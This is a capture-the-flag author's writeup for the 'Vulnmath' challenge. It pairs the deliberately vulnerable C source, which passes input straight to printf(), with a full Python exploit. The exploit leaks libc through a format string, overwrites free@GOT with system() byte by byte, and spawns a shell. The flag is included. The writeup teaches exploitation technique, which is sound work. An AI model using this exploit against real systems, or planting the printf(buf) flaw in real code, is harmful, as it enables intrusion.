# Vulnmath Author Writeup

## Description

Enter the belly of the beast and emerge victorious.

*Hint:* What all can printf do? Can you leverage it's capabilites?

## A Word From The Author

This year I was pushing printf() exploits... for good reason to. **printf()** is fun to play with and satisfying to exploit (at least for me that is). I was wondering if you could get a shell just using a format string exploit, and the short answer is yes! This challenge was definitely my favorite of the competition, hopefully you enjoyed it as well.

## Information Gathering

``` c
#include <stdio.h>  // prints
#include <stdlib.h> // malloc
#include <string.h> // strcmp
#include <unistd.h> // read
#include <fcntl.h>  // open
#include <unistd.h> // close
#include <time.h>   // time

int main() {
    setvbuf(stdout, NULL, _IONBF, 20);
    setvbuf(stdin, NULL, _IONBF, 20);

	int a, b, ans, score = 0;
	// Used for CTF-style exploit
	char *unsafe_buffer = malloc(64);
	char buf[32];
	memset(buf, 0, 32);
	srand(time(0));

	puts("Welcome to VulnMath\nWhere your wildest shells can come true\n");

	for (int i = 0; i < 6; i++) {
		// range: 1-20
		// if 0 is in range then the script fails when entering '%N$X' input
		a = (rand() % 19)+1;
		b = (rand() % 19)+1;
		printf("What is %d * %d?\n> ", a, b);

		read(0, unsafe_buffer, 32);
		memcpy(buf, unsafe_buffer, 32);
		ans = atoi(buf);

		if (ans == (a*b)) {
			puts("Correct! +5 points");
			score += 5;
		} else {
			puts("Incorrect!");
			// The meat of the challenge
			printf(buf);
		}
		puts("");
	}

	printf("Final Score: %d\n", score);
	puts("Thanks for playing!");
	// The key to the challenge
	free(unsafe_buffer);

    return 0;
}
```

![info.png](./res/548faf724ae4447181d7d3202b6d867c.png)

Clearly this is an innocent math game used to teach kids to program, or it was when I originally wrote it in 8th grade. It's since been reappropriated for cold-hearted exploitation. The main loop could be boiled down to just this:

``` c
while (true) {
    printf(buf);
}
```

One of my previous challenges, *printfun*, showed that printf() has the capabilities to overwrite memory and I wanted to push those bounds. Since this challenge doesn't have **PIE** and our buffer is on the stack, that means that the GOT is open for us to do as we please.

Unlike the quick loop I showed above, we only have 6 iterations with printf() until the loop ends, not a lot to work with but just enough. Here was my intention for the 6 iterations:

1. Leak libc address from GOT
2. Single-byte GOT overwrite
3. Single-byte GOT overwrite
4. Single-byte GOT overwrite
5. Single-byte GOT overwrite
6. "/bin/sh"

I'm getting ahead of myself. The first iteration is used to read from one of the GOT addresses that's already been initialzed and then use that to calculate offsets for `system()` and `/bin/sh`.

The next 4 iterations can realy be just 2 iterations, but that's a little inconsistent so I left it with 4. When printf() writes a value to a pointer using `%n` it writes all 4 bytes (in x86). So a single overwrite of a pointer would essentially only set the least significant byte. I mentioned you *can* just use 2 iterations, but depending on the size of each of the two bytes you intend to write, it can get inconsistent. Print() has no problems writing anything between 0x00 to 0xff.

So if we wanted to overwrite a GOT address with `0xdeadbeef` over 4 iterations it would look like this:

``` asm
0x804c014: 0x180e1128 ; before write
0x804c014: 0x000000ef ; 1st write
0x804c014: 0x0000beef ; 2nd write
0x804c014: 0x00adbeef ; 3rd write
0x804c014: 0xdeadbeef ; 4th write
```

It's also important to note that since print() writes 4 bytes each time, you are overwriting whichever GOT address is after whatever you choose to overwrite.

![GOT.png](./res/29fdf8d258634eac827f57e87957968f.png)

I chose to overwrite free() for several reasons, one of which is that **time()** is the value that will also be overwritten in this exploit, and we don't use it anymore so we won't segfault.

Now we know what we are going to write and where, we just gotta figure out the *how*. Writing single bytes to an address with requires that we have our buffer on the stack (which we do) and takes two steps:

1. Print the number of characters as the value we want to write (IE. ABCD = 0x00000004 is written)
2. %n overwrite to buffer on stack

The first step is the fun part here. printf() will obey your every command when printing output using a format string. By that I mean if you tell it to print an address as a hex value (`%08x`) it will print print all 32 bits even if they are 0's. By this same logic if we tell printf to print all 256 characters of the address, printf will despite the fact it contains only a max of 8 characters in x86. We don't care that anything past 8 characters will just print empty spaces, because it allows us to get exact single-byte values to write. And just to be safe let's only print from the first argument on the stack (for my paranoia). Then our 4 overwrites will look like this:

> %1$`N`x

Only the value N will change for each of the 4 iterations. \
If we wanted to write `0xdeadbeef`, then our first byte would be `0xef` which is **239** in decimal. This makes our first overwrite message: `%1$239x`

The last step, and the other reason I used free() as my GOT overwrite, is to call our *system()* through another function. Now calling system is all well and good except we need to pass it an argument. Free() makes a great candidate due to the fact that it free's the heap address that your buffer is read into. Since we have 6 loops where our input is read, we can simply send **"/bin/sh"** on our last loop to ensure that:

``` c
free(buffer) => system("/bin/sh")
```

Alright, I'm getting anxious, let's write this thing!

## Exploitation

``` python
#!/usr/bin/env python
from thpoonpwn import *

elf,libc,args = pwninit(
    remcmd =    'chal.tuctf.com 3050?', # I forgot the full port...
    localcmd =  './vulnmath',
#    libcid =    '',
    libcfile =  './libc.so.6',
    local =     True,
#    pause =     True,
#    copy =      True,
#    ldpreload = True,
#    debug=True
)
p = pwnstart(args)
#___________________________________________________________________________________________________
# Local Addresses
putsGOT =       elf.got['puts'] # the address we will leak libc from
freeGOT =       elf.got['free'] # the address we will overwrite with system()
# Libc Addresses
systemlibc =    libc.sym['system']
putslibc =      libc.sym['puts']

# How far the buffer is on the stack (for print leaking)
buffoff = 6

#       Leak Libc Address
p.recv()
# Leak stack addr
addroffs = buffoff+1
payload = ''
payload += "%"+str(addroffs)+"$s" # leak puts w/ padding
payload += flat(putsGOT)
payload += '\x00'*(32-len(payload))
p.send(payload)

# Get leaked addresses
p.recvuntil('Incorrect!\n')
puts = u32(p.recv(4))
system = puts + (systemlibc - putslibc)
#print 'System: ' + str(hex(system))
system = flat(system)



#       Overwrite stack_check@GOT with system
addroff = buffoff+3
writeGOT = freeGOT # Where we will overwrite
writeaddr = system # The value to overwrite

# Overwrite free@GOT with system()
for i in range(4):
    # Get byte to write
    n = ord(writeaddr[i])
    # get address to write to
    addr = writeGOT + i

    payload = ''
    payload += '%1$'+str(n)+'x' # Print N bytes

    # We can't send a "%N$x" if we want to send a NULL byte
    #if i == 0 and n == 0: payload = '';
    if n == 0: payload = '';

    payload += '%'+str(addroff)+'$n' # Write N bytes
    payload += '\x00'*(12-len(payload)) # padding
    payload += flat(addr) # the addresses
    #payload += flat(0)*2
    payload += '\x00'*(32-len(payload)) # moar padding
    p.send(payload)
    p.recv()

# since free(buf) = system(buf) this means system("/bin/sh")
p.send("/bin/sh\x00"); p.recv()
p.interactive()

#___________________________________________________________________________________________________
pwnend(p, args)
```

![exploit.png](./res/d7faf12c26c9461daf5440cebade1ac5.png)

And there it is... pure satisfaction.

## Endgame

I'll say it again, this was my favorite challenge this year and I had as much fun writing it as I did pwning it. It blows my mind that printf(), a function used to print fancy output, can be leveraged to potentially spawn a shell.

Thanks for playing, hope to see you next year.

> **flag:** TUCTF{I_w45_w4rn3d_4b0u7_pr1n7f..._bu7_I_d1dn'7_l1573n}

